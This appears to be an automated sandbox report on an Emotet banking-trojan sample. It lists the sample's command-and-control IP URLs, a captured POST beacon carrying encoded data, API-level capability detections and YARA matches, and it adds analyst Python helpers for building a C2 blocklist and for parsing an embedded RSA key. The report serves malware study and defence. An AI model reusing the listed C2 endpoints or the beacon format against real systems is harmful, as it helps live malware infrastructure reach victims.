Source: unknown | TCP traffic detected without corresponding DNS query: 59.103.164.174
Source: unknown | TCP traffic detected without corresponding DNS query: 59.103.164.174
Source: unknown | TCP traffic detected without corresponding DNS query: 59.103.164.174
Source: unknown | TCP traffic detected without corresponding DNS query: 59.103.164.174
Source: unknown | TCP traffic detected without corresponding DNS query: 59.103.164.174
Contains functionality to download additional files from the internet
Source: C:\Windows\SysWOW64\leelsensor.exe | Code function: 8_2_00F91383 InternetReadFile,8_2_00F91383
Posts data to webserver
Source: unknownHTTP traffic detected: POST /dIcDsclHnHkYC8AHTsU HTTP/1.1Referer: http://45.56.88.91/dIcDsclHnHkYC8AHTsUContent-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.56.88.91:443Content-Length: 606Connection: Keep-AliveCache-Control: no-cacheData Raw: 64 49 63 44 73 63 6c 48 6e 48 6b 59 43 38 41 48 54 73 55 3d 55 6a 4c 62 58 53 6e 68 70 30 50 51 67 39 70 32 31 32 49 65 69 68 36 63 4e 55 46 38 54 48 52 63 44 50 69 6a 63 69 59 73 53 6e 67 6d 41 44 65 77 52 53 64 68 66 52 46 38 36 71 4d 53 58 62 56 68 50 70 48 4a 61 6c 44 42 57 6d 6d 49 46 76 77 35 74 57 69 78 33 30 7a 75 6b 33 71 35 47 78 6e 4e 69 79 59 6b 77 7a 79 57 37 59 45 35 57 61 56 6e 65 4d 77 70 45 52 6a 39 55 4f 6f 49 50 72 6f 53 64 33 74 76 6d 31 42 33 75 46 4f 25 32 42 73 49 67 42 4d 6e 25 32 46 70 75 4e 72 51 25 32 46 30 41 5a 61 79 6c 6b 62 37 63 4c 62 64 75 51 71 4a 6b 65 53 43 42 79 46 6a 54 4e 72 35 42 4c 6d 74 4a 58 47 4c 49 46 35 38 73 71 6a 63 59 6d 46 42 36 6d 54 76 45 52 55 57 50 48 75 25 32 42 51 34 34 47 4f 45 42 6d 63 70 5a 39 32 57 77 4c 71 70 57 74 77 4e 72 7a 43 75 76 55 74 53 37 52 59 76 4c 6d 35 58 56 37 45 25 32 42 35 4c 36 53 73 4c 37 43 78 71 69 59 6b 69 4d 33 41 68 50 46 65 4e 25 32 42 79 57 65 6b 65 69 47 73 55 4f 66 73 59 56 61 6c 72 36 43 4d 31 52 4b 6a 53 6b 48 48 75 4f 31 71 41 48 37 43 78 42 74 32 65 77 58 25 32 46 46 35 39 41 73 25 32 42 75 36 6b 6a 47 6b 69 69 56 69 47 30 78 72 4e 61 32 70 48 39 64 7a 55 59 74 6e 32 59 53 53 62 47 34 4a 34 32 39 4e 4d 34 36 50 49 67 31 54 31 71 43 52 30 51 71 39 35 39 79 44 33 43 32 65 63 44 6b 79 50 39 4e 38 25 32 42 4e 46 50 79 50 44 6e 67 4d 76 49 58 71 79 6b 48 4b 59 54 6a 49 42 45 38 4d 72 6a 4a 74 71 45 25 32 46 77 35 63 55 31 77 70 4c 30 30 31 65 70 45 25 32 42 65 70 56 30 70 39 6d 48 38 47 73 53 67 57 73 69 37 39 38 6c 4b 75 30 73 25 32 42 75 66 34 69 71 6b 77 
35 77 66 34 7a 77 41 73 58 6d 75 6f 66 4f 66 75 48 4f 4f 25 32 42 52 49 53 62 41 5a 6d 6e 63 78 36 47 53 34 52 38 58 49 31 4e 4f 63 6e 4b 55 6e 6a 68 52 37 55 42 6c 4a 7a 52 52 75 71 4e 69 47 37 37 6e 49 34 61 31 59 66 67 50 58 32 50 44 4d 47 45 77 Data Ascii: dIcDsclHnHkYC8AHTsU=UjLbXSnhp0PQg9p212Ieih6cNUF8THRcDPijciYsSngmADewRSdhfRF86qMSXbVhPpHJalDBWmmIFvw5tWix30zuk3q5GxnNiyYkwzyW7YE5WaVneMwpERj9UOoIProSd3tvm1B3uFO%2BsIgBMn%2FpuNrQ%2F0AZaylkb7cLbduQqJkeSCByFjTNr5BLmtJXGLIF58sqjcYmFB6mTvERUWPHu%2BQ44GOEBmcpZ92WwLqpWtwNrzCuvUtS7RYvLm5XV7E%2B5L6SsL7CxqiYkiM3AhPFeN%2ByWekeiGsUOfsYValr6CM1RKjSkHHuO1qAH7CxBt2ewX%2FF59As%2Bu6kjGkiiViG0xrNa2pH9dzUYtn2YSSbG4J429NM46PIg1T1qCR0Qq959yD3C2ecDkyP9N8%2BNFPyPDngMvIXqykHKYTjIBE8MrjJtqE%2Fw5cU1wpL001epE%2BepV0p9mH8GsSgWsi798lKu0s%2Buf4iqkw5wf4zwAsXmuofOfuHOO%2BRISbAZmncx6GS4R8XI1NOcnKUnjhR7UBlJzRRuqNiG77nI4a1YfgPX2PDMGEw
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Feb 2020 08:33:23 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to 
disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Urls found in memory or binary dataShow sources
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://107.2.2.28/FpU6cre
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://186.75.241.230/8HPGE9
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://186.75.241.230/8HPGE9bD
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://190.12.119.180:443/tovm2Xky7BQG8IM
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://206.81.10.215:8080/bAvwkbq
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://206.81.10.215:8080/bAvwkbq6
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://206.81.10.215:8080/bAvwkbq8
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://206.81.10.215:8080/bAvwkbqP
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://206.81.10.215:8080/bAvwkbqp
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://45.56.88.91:443/dIcDsclHnHkYC8AHTsU
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://45.56.88.91:443/dIcDsclHnHkYC8AHTsUa
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://45.56.88.91:443/dIcDsclHnHkYC8AHTsUu
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://45.56.88.91:443/dIcDsclHnHkYC8AHTsUy
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://47.50.251.130/HLHvQpx
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://47.50.251.130/HLHvQpx/
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://47.50.251.130/HLHvQpxstemprofile
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://51.68.220.244/THUbD
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://51.68.220.244:8080/THUbD
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://59.103.164.174/zeZ30sx6u6cxuuDrRRH
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://59.103.164.174/zeZ30sx6u6cxuuDrRRH)
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://59.103.164.174/zeZ30sx6u6cxuuDrRRH0
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://59.103.164.174/zeZ30sx6u6cxuuDrRRH=
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://59.103.164.174/zeZ30sx6u6cxuuDrRRHM
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://59.103.164.174/zeZ30sx6u6cxuuDrRRHONVf
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://59.110.18.236:443/kwTaaZ8qRHU2
Uses HTTPS (inferred from port 443 alone; the memory strings above carry an http:// scheme on port 443 for 190.12.119.180, 45.56.88.91 and 59.110.18.236, so read this as "traffic on 443", not as confirmed TLS)
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
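The URL strings above are the sample's C2 list as it survived in leelsensor.exe memory, with several entries repeated because the strings scanner ran on into adjacent bytes ("bAvwkbq6", "...TsUa", "HLHvQpxstemprofile"). As an added example, not code from Joe Sandbox or from the sample, the script below turns such report lines into a host:port blocklist, collapses the run-on path variants, and lists the endpoints that speak plain HTTP on port 443, which a port-based "Uses HTTPS" signature does not distinguish. The input is constructed from a subset of the report's own lines plus one benign hostname URL added as a negative case.

```python
"""Triage helper for 'String found in binary or memory' URL lines.

Added example; not part of the Joe Sandbox report or the sample.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Constructed input: a subset of the report's own memory strings, plus a benign
# hostname URL (last line) added here as a negative case. The trailing bytes on
# some paths ("bAvwkbq6", "...TsUa", "HLHvQpxstemprofile") are adjacent memory
# the strings scanner ran into, not distinct URIs.
SAMPLE_LINES = """\
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://206.81.10.215:8080/bAvwkbq
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://206.81.10.215:8080/bAvwkbq6
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://206.81.10.215:8080/bAvwkbqP
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://45.56.88.91:443/dIcDsclHnHkYC8AHTsU
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://45.56.88.91:443/dIcDsclHnHkYC8AHTsUa
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://47.50.251.130/HLHvQpx
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://47.50.251.130/HLHvQpx/
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://47.50.251.130/HLHvQpxstemprofile
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://51.68.220.244/THUbD
Source: leelsensor.exe, 00000008.00000002.3820001445.00000000006C9000.00000004.00000020.sdmp String found in binary or memory: http://51.68.220.244:8080/THUbD
Source: constructed negative case String found in binary or memory: http://example.com/robots.txt
"""

URL_RE = re.compile(r"https?://[0-9A-Za-z.\-]+(?::\d{1,5})?/[0-9A-Za-z._/\-]*")
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


@dataclass
class Endpoint:
    host: str
    port: int
    schemes: set = field(default_factory=set)
    paths: set = field(default_factory=set)


def extract_endpoints(text):
    """Map (host, port) -> Endpoint for every bare-IP URL in the text.

    Hostname URLs are skipped: the embedded tier-1 list is IP:port pairs, and
    hostnames found in memory are usually OS or library artefacts.
    """
    found = {}
    for m in URL_RE.finditer(text):
        u = urlsplit(m.group(0))
        host = u.hostname or ""
        if not IPV4_RE.match(host):
            continue
        port = u.port or (443 if u.scheme == "https" else 80)
        ep = found.setdefault((host, port), Endpoint(host, port))
        ep.schemes.add(u.scheme)
        ep.paths.add(u.path.strip("/"))
    return found


def collapse_paths(paths):
    """Keep only the shortest path of each family; longer strings that merely
    extend it are memory run-on, not separate URIs."""
    kept = []
    for p in sorted(paths, key=len):
        if not any(p.startswith(k) for k in kept):
            kept.append(p)
    return kept


def blocklist(text):
    """Sorted host:port strings for a proxy or firewall blocklist."""
    return sorted(f"{h}:{p}" for h, p in extract_endpoints(text))


def http_on_tls_port(text):
    """Endpoints spoken to with a plain http:// scheme on port 443; a policy
    that trusts the port number to imply TLS will not inspect these."""
    return sorted(f"{e.host}:{e.port}" for e in extract_endpoints(text).values()
                  if e.port == 443 and e.schemes == {"http"})


if __name__ == "__main__":
    for (host, port), ep in sorted(extract_endpoints(SAMPLE_LINES).items()):
        print(f"{host}:{port}  paths={collapse_paths(ep.paths)}")
    print("plain HTTP on 443:", http_on_tls_port(SAMPLE_LINES))
```

Feed it the full "String found in binary or memory" section of a report rather than the sample above; the host:port pairs are what to block, while the URI paths rotate between builds and are only useful for matching this specific binary's traffic.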

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00409870 OpenClipboard
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00407300 GetClipboardData,CloseClipboard
Potential key logger detected (key state polling based; runs of three or four GetKeyState calls beside ScreenToClient, GetCursorPos and SetWindowPos are how MFC window handlers test the Shift, Ctrl and Alt modifiers, and every address below lies in the main module's own code at 0x0040xxxx-0x0045xxxx rather than in the unpacked regions where the Emotet payload is matched further down, so treat this as host-application code, not as payload capability)
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_0044CA05 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00450DD1 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_0040CEC5 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_0044D331 GetKeyState,GetKeyState,GetKeyState
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_0044CA05 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_00450DD1 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_0040CEC5 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_0044D331 GetKeyState,GetKeyState,GetKeyState
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_00411DC8 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA

E-Banking Fraud:

Detected Emotet e-Banking trojan
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_022BDE9C
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F9DE9C
Yara detected Emotet
Source: Yara match File source: 00000008.00000002.3820155215.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2213516485.0000000000F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2129706535.0000000002230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2213571740.0000000000F81000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3820207209.0000000000F91000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2217305999.0000000002290000.00000040.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware; here the CryptDecodeObjectEx -> CryptImportKey pairing is the sequence for loading an embedded public-key blob, and no file encryption or ransom note activity appears elsewhere in this report)
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_022B1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext
Source: C:\Windows\SysWOW64\leelsensor.exe Code function: 8_2_00F91F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext
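The CryptAcquireContextW -> CryptDecodeObjectEx -> CryptImportKey chain in 8_2_00F91F75 is the CryptoAPI way of turning an embedded DER public key into a CSP key handle. The script below, an added example and not code from the sample or from Joe Sandbox, performs the CryptDecodeObjectEx step offline: it parses a PKCS#1 RSAPublicKey and emits the PUBLICKEYBLOB layout that CryptImportKey consumes, so a key carved from the unpacked region can be checked or handed to other tooling. That the embedded key is a PKCS#1 RSAPublicKey is an assumption (the report shows the API chain, not the blob it decodes); the 64-bit test key is constructed and far too small to be realistic.

```python
"""DER RSAPublicKey -> Microsoft CryptoAPI PUBLICKEYBLOB.

Added example, not sample or Joe Sandbox code. Mirrors what
CryptDecodeObjectEx(RSA_CSP_PUBLICKEYBLOB) does before CryptImportKey.
Assumption: the embedded key is PKCS#1 RSAPublicKey ::= SEQUENCE {
modulus INTEGER, publicExponent INTEGER }.
"""
import struct

PUBLICKEYBLOB = 0x06          # BLOBHEADER.bType
CUR_BLOB_VERSION = 0x02       # BLOBHEADER.bVersion
CALG_RSA_KEYX = 0x0000A400    # BLOBHEADER.aiKeyAlg
RSA1_MAGIC = 0x31415352       # RSAPUBKEY.magic, "RSA1" little-endian


def _read_tlv(buf, pos, expected_tag):
    """Read one DER tag-length-value at buf[pos]; return (value, next_pos)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated DER element")
    tag, length = buf[pos], buf[pos + 1]
    if tag != expected_tag:
        raise ValueError(f"expected tag 0x{expected_tag:02x} at offset {pos}, got 0x{tag:02x}")
    pos += 2
    if length & 0x80:                       # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("unsupported or truncated DER length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("DER value runs past end of buffer")
    return buf[pos:pos + length], pos + length


def parse_rsa_public_key(der):
    """Return (n, e) from a PKCS#1 RSAPublicKey; reject trailing or extra data."""
    body, end = _read_tlv(der, 0, 0x30)     # SEQUENCE
    if end != len(der):
        raise ValueError("trailing bytes after RSAPublicKey")
    n_bytes, pos = _read_tlv(body, 0, 0x02)  # INTEGER modulus
    e_bytes, pos = _read_tlv(body, pos, 0x02)  # INTEGER publicExponent
    if pos != len(body):
        raise ValueError("unexpected extra elements in RSAPublicKey")
    n, e = int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")
    if n <= 0 or e <= 0:
        raise ValueError("modulus and exponent must be positive")
    return n, e


def to_publickeyblob(n, e):
    """BLOBHEADER + RSAPUBKEY + little-endian modulus, as CryptImportKey expects."""
    if e > 0xFFFFFFFF:
        raise ValueError("RSAPUBKEY.pubexp is a 32-bit field")
    bitlen = ((n.bit_length() + 7) // 8) * 8   # CryptoAPI wants a whole number of bytes
    header = struct.pack("<BBHI", PUBLICKEYBLOB, CUR_BLOB_VERSION, 0, CALG_RSA_KEYX)
    rsapubkey = struct.pack("<III", RSA1_MAGIC, bitlen, e)
    return header + rsapubkey + n.to_bytes(bitlen // 8, "little")


def der_to_publickeyblob(der):
    return to_publickeyblob(*parse_rsa_public_key(der))


# Constructed 64-bit key, readable by eye; real keys are 1024 bits or more.
SAMPLE_DER = bytes.fromhex("3010" "020900d2f4a7c39e1b5f6d" "0203010001")

if __name__ == "__main__":
    n, e = parse_rsa_public_key(SAMPLE_DER)
    print(f"n=0x{n:x} e={e}")
    print(der_to_publickeyblob(SAMPLE_DER).hex())
```

The first eight bytes of the output (06 02 00 00 00 A4 00 00) followed by "RSA1" are a useful carving signature for already-decoded blobs in memory, just as a 0x30 0x82 sequence header followed by 0x02 0x82 0x01 0x01 marks a 2048-bit DER key in the binary.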

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.2129758343.0000000002251000.00000020.00000001.sdmp, type: MEMORY Matched rule: Emotet Payload, author: kevoreilly
Source: 00000008.00000002.3820155215.0000000000F70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Emotet Payload, author: kevoreilly
Source: 00000005.00000002.2213516485.0000000000F60000.00000040.00000001.sdmp, type: MEMORY Matched rule: Emotet Payload, author: kevoreilly
Source: 00000001.00000002.2129706535.0000000002230000.00000040.00000001.sdmp, type: MEMORY Matched rule: Emotet Payload, author: kevoreilly
Source: 00000005.00000002.2213571740.0000000000F81000.00000020.00000001.sdmp, type: MEMORY Matched rule: Emotet Payload, author: kevoreilly
Source: 00000004.00000002.2217330975.00000000022B1000.00000020.00000001.sdmp, type: MEMORY Matched rule: Emotet Payload, author: kevoreilly
Source: 00000008.00000002.3820207209.0000000000F91000.00000020.00000001.sdmp, type: MEMORY Matched rule: Emotet Payload, author: kevoreilly
Source: 00000004.00000002.2217305999.0000000002290000.00000040.00000001.sdmp, type: MEMORY Matched rule: Emotet Payload, author: kevoreilly
Contains functionality to call native functions
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00402E90 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_00402E90 NtAllocateVirtualMemory
Contains functionality to delete services
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_022BE068 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_022B1D2B CreateProcessAsUserW,CreateProcessW
Creates files inside the system directory
Source: C:\Windows\SysWOW64\leelsensor.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache (C:\Windows\SysWOW64\config\systemprofile is the LocalSystem profile as seen by a 32-bit process, so a WinINet cache appearing there means leelsensor.exe was running as SYSTEM, consistent with the service it registers; it also accounts for the "HLHvQpxstemprofile" memory string above, where a C2 URI runs into the tail of "systemprofile")
Deletes files inside the Windows folder
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe File deleted: C:\Windows\SysWOW64\leelsensor.exe:Zone.Identifier (the Zone.Identifier alternate data stream, i.e. the mark-of-the-web, not the executable itself; see also "Hides that the sample has been downloaded from the Internet" below)
Detected potential crypto function (the 0x0040xxxx-0x0046xxxx hits are in the host application's own code; the 0x0229xxxx, 0x022Bxxxx and 0x00F6xxxx-0x00F9xxxx hits sit in the unpacked memory regions that the Emotet YARA rule matches)
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00454090
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00402270
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00462489
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_0045449C
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00464661
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_004548BC
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_004629CD
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00458CB7
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00416F81
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_004630C5
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_004537E7
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_004138F6
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 1_2_00453CBC
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_00454090
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_00402270
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_00462489
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_0045449C
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_00464661
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_004548BC
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_004629CD
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_00458CB7
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_00416F81
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_004630C5
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_004537E7
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_004138F6
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_00453CBC
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_00461F45
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_022928C1
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_022930E8
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_022930E4
Source: C:\Users\user\Desktop\n5hhkdky_exe.exe Code function: 4_2_022B37A9
